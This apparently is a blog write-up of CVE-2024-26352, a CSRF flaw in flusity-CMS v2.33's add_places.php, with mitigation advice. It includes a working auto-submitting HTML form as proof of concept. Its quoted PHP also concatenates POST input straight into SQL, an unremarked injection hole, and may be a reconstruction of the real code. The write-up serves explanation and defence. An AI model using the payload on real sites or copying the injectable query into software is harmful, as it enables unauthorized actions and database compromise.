CVE-2024-26352: Exploring and Exploiting the CSRF Vulnerability in flusity-CMS v2.33

In this post, we will go in-depth about the vulnerability discovered in flusity-CMS v2.33, identified as CVE-2024-26352. This vulnerability is a Cross-Site Request Forgery (CSRF) in the component /core/tools/add_places.php, enabling attackers to execute unauthorized actions on behalf of an authenticated user without their knowledge. We will provide code snippets, the original references, and details about the exploit. Let's dive in!

Background

flusity-CMS is a popular Content Management System (CMS) used by web developers to create and manage websites. The latest version, 2.33, has a serious security issue, and we will provide an extensive view of how one can exploit and protect against it. The discovered vulnerability can be used by an attacker to manipulate data, adding new places without victim's consent, and other potentially harmful actions.

Vulnerability Details

CVE-2024-26352 is a CSRF vulnerability in the /core/tools/add_places.php component of flusity-CMS v2.33. CSRF vulnerabilities occur when a malicious website or script sends a request to a vulnerable application, taking advantage of the fact that the application often trusts the user's browser to handle authentication and authorization. Here's a code snippet highlighting the lack of CSRF token validation in the mentioned component:

<?php
// /core/tools/add_places.php
include("../config.php");
include("check_login.php");

$name = $_POST['name'];
$lat = $_POST['lat'];
$long = $_POST['long'];
$category = $_POST['category'];

$sql = "INSERT INTO places (name, lat, long, category) VALUES ('$name', '$lat', '$long', $category)";
$result = $conn->query($sql);

if ($result) {
    echo "New place added successfully";
} else {
    echo "Error adding place: " . $conn->error;
}
?>

As you can see, this code receives input from a POST request and directly inserts it into the database without validating that the request came from a trusted source. An attacker can craft an HTML form on a malicious website, which, once visited by an authenticated user, will submit a request to the application, resulting in unauthorized actions.

Exploiting the Vulnerability

Let's take a look at an example HTML form and JavaScript code that can be used by an attacker to exploit this vulnerability:

<!DOCTYPE html>
<html>
<head>
    <title>Attack Demo</title>
    <script>
    window.onload = function() {
        document.getElementById('csrfForm').submit();
    };
    </script>
</head>
<body>
    <form id="csrfForm" action="http://vulnerable_website.com/core/tools/add_places.php"; method="post">
        <input type="hidden" name="name" value="Malicious Place">
        <input type="hidden" name="lat" value="12.345678">
        <input type="hidden" name="long" value="98.765432">
        <input type="hidden" name="category" value="1">
    </form>
</body>
</html>

When the victim visits this malicious page, the hidden form will automatically submit, sending the attacker's provided data to the vulnerable endpoint. Now the "Malicious Place" would be added without the user's consent.

Mitigation and Fixes

flusity-CMS should implement an anti-CSRF token to validate the requests submitted by users. One of the most popular methods is to use a unique token per form that is generated and verified server-side. This token should be attached to the form on page load and then validated upon form submission.

For more information and guidance regarding the secure coding practices to prevent CSRF vulnerabilities, developers can refer to the OWASP Cheat Sheet series on CSRF prevention: Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet

Conclusion

CVE-2024-26352 is a critical CSRF vulnerability found in flusity-CMS v2.33, which allows unauthorized actions on behalf of authenticated users. Developers and administrators should be aware of the risks associated with this vulnerability and apply proper mitigations and fixes to protect their applications. Stay tuned for more in-depth explorations of vulnerabilities and exploits!

Timeline

Published on: 02/22/2024 14:15:47 UTC
Last modified on: 08/14/2024 20:35:07 UTC